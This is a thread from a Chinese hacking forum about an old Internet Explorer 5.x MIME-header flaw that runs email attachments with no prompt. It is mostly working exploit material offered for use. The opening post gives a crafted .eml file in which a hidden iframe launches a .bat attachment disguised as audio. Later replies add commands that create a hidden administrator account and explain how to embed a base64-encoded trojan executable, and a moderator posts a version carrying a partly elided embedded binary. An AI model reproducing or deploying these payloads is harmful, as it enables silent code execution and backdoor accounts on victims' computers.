论坛: 黑客进阶 标题: 浏览器MIME头漏洞 复制本贴地址    
作者: sadboy [chiruwn]    论坛用户   登录
浏览器MIME头漏洞
IE 5.0/5.01/5.5
原理:
  一般情况下如果附件是文本,IE会读它,如果是VIDEOCL IP,IE会查看,如果是图形,IE就会显示它,但如果是一个exe文件,IE就会提示用户是否执行,但是具有危害的是,当攻击者更改MIME类型之后,IE就会不经过提示用户而直接执行。

具体攻击方法:
//把以下程序编辑为hello.eml文件,然后放在网站上用浏览器打开
From:"xxxxxx"
Subject:mail 0
Date:Thu,2 Nov 2000 13.27.33 +0100
MIME-Version:1.0
Content-Type:multipart/related;
type="multipart/alternative;
boundary="1"
X-priority:3
X-MSMail-Priority:Normal
X-Unsent:1


--1
Content-Type:multipart/alternative;
boundary="2"


--2
Content-Type:text/html;
charset="iso-8859-1"
Content-Transfer-Encoding:quoted-printable
<HTML>
<HEAD>
<BODY bgcolor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
HELLO MY FRIEND!!!!<BR>
</BODY>
</HTML>

--2--


--1
Content-Type:audio/x-wav;
name="hello.bat"
Content-Transfer-Encoding:quoted-printable
Content-ID:<THE-CID>

echo OFF
dir *.*


--1


地主 发表时间: 01/07 15:34

回复: quake [quake]   论坛用户   登录
测试失败,什么都没发生!

B1层 发表时间: 01/07 16:23

回复: sadboy [chiruwn]   论坛用户   登录
忘了告诉你,要在9x系统下才有用,如果是2000系统,还要加:
net user someone 123456/add
net localgroup administrators someone/add

B2层 发表时间: 01/08 15:03

回复: tabris17 [tabris17]   论坛用户   登录
失败很正常
该漏洞对打过补丁的IE或IE6.0无效

B3层 发表时间: 01/08 20:55

回复: xuchen0819 [xuchen0819]   论坛用户   登录
那就是技术太老了!呵呵!

B4层 发表时间: 01/10 17:03

回复: BlueSnoopy [bluesnoopy]   论坛用户   登录
ie6.0上已经没用

B5层 发表时间: 01/14 12:32

回复: SANKKING [sankking]   论坛用户   登录
 附:如果你想让对方运行一些你自己的EXE程序,木马之类的东西,那么必须把该程序先换成64base编码制,再贴到后面~~        接着……

B6层 发表时间: 03/07 13:33

回复: aoming [aoming]   版主   登录
huhu,真佩服你的耐心啊,居然把阎雪写的这么多文字打了出来,呵呵
你给的例子只是运行一个DOS下的dir而已,可能还不能说攻击吧?


[此贴被 咖啡╃泡面(aoming) 在 03月10日21时01分 编辑过]

B7层 发表时间: 2003-03-10 21:13:01

回复: aoming [aoming]   版主   登录
我来给个相对完整的算了,今天自攻了一下.huhu
代码:

From: "xxxxx"
Subject: mail
Date: Thu, 2 Nov 2000 13:27:33 +0100
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--1
Content-Type: multipart/alternative;
boundary="2"


--2
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
ok<BR>
</BODY>
</HTML>

--2--

--1
Content-Type: audio/x-wav;
      name="aa.exe"
Content-Transfer-Encoding: base64
Content-ID: <THE-CID>

TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAIAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV2lu
MzINCiQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQ
RQAATAEKAMwneT4AAAAAAAAAAOAADgELAQUAAPAFAACQAAAAAAAAAaAHAAAQAAAAAAYAAABAAAAQ
AAAAAgAABAAAAAAAAAAEAAAAAAAAAADQBwAABgAAAAAAAAIAAAAAABAAACAAAAAAEAAAEAAAAAAA
ABAAAAAA4AYAtQAAAKyvBwA0AQAAAPAGAAA2AAAAAAAAAAAAAAAAAAAAAAAAVK8HAAgAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAA8rwcAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAQAC50ZXh0AAAAAPAFAAAQAAAAggIAAAYAAAAAAAAAAAAAAAAAAEAA
AMAuZGF0YQAAAACQAAAAAAYAABgAAACIAgAAAAAAAAAAAAAAAABAAADALnRscwAAAAAAEAAAAJAG
.........省略若干...............
7u4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////////////////////
//8AH///AB///wAf//8AH/8AAB//AAAfAAAAHwAAAB8AAAABAAAAAQAAAAEAAAABAAAAAQAAAAEA
AAABAAAAAQAAAAEAAAABAAAAAQAAAAEAADwB/wA8Af8APAH/ADwB/wA///8AP////////////wAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

------=_NextPart_000_0009_01C2EECC.16E8F4A0--





[此贴被 咖啡╃泡面(aoming) 在 04月01日20时13分 编辑过]

B8层 发表时间: 04/01 20:26

回复: morziguang [morziguang]   论坛用户   登录
不知道运行了会有什么后果,还有就是怎么转换成64base.

B9层 发表时间: 04/01 20:48

论坛: 黑客进阶

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号